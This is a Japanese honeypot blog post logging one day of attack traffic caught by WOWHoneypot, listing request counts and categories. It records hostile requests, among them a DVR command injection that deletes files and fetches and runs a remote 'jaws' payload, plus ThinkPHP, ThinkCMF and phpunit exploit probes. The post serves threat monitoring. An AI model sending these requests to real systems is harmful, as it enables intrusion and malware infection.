23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(337日目)

2020/02/18(火)

トータルは96件でした。

ハンティングログは以下です。

85.154.77[.]162 wget+hxxp[:]//scan[.]casualaffinity[.]net/jaws

www.virustotal.com
www.virustotal.com

件数 概要 リクエス
46 アクセス GET /
16 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
8 調査 GET /is_test
4 モデム構成ファイルの調査 GET /save_rg_conf.cgi
4 アクセス GET /favicon.ico
2 phpunit脆弱性を狙った通信 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
2 クローリング GET /robots.txt
2 不正中継の試み CONNECT ip.ws.126.net:443
1 phpMyAdminの調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 調査 GET /version
1 Solrの調査 GET /solr/admin/info/system?wt=json
1 MVPower DVRなどの脆弱性を狙った通信 GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//scan.casualaffinity.net/jaws;sh+/tmp/jaws
1 phpMyAdminの調査 GET /pma/scripts/setup.php
1 phpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
1 phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
1 phpMyAdminの調査 GET /myadmin/scripts/setup.php
1 ThinkPHPの脆弱性を狙った通信 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
1 phpMyAdminの調査 GET /MyAdmin/scripts/setup.php
1 ThinkCMFの脆弱性を狙った通信 GET /?a=fetch&content=die(@md5(HelloThinkCMF))
1 リモートデバッグの調査 GET /?XDEBUG_SESSION_START=phpstorm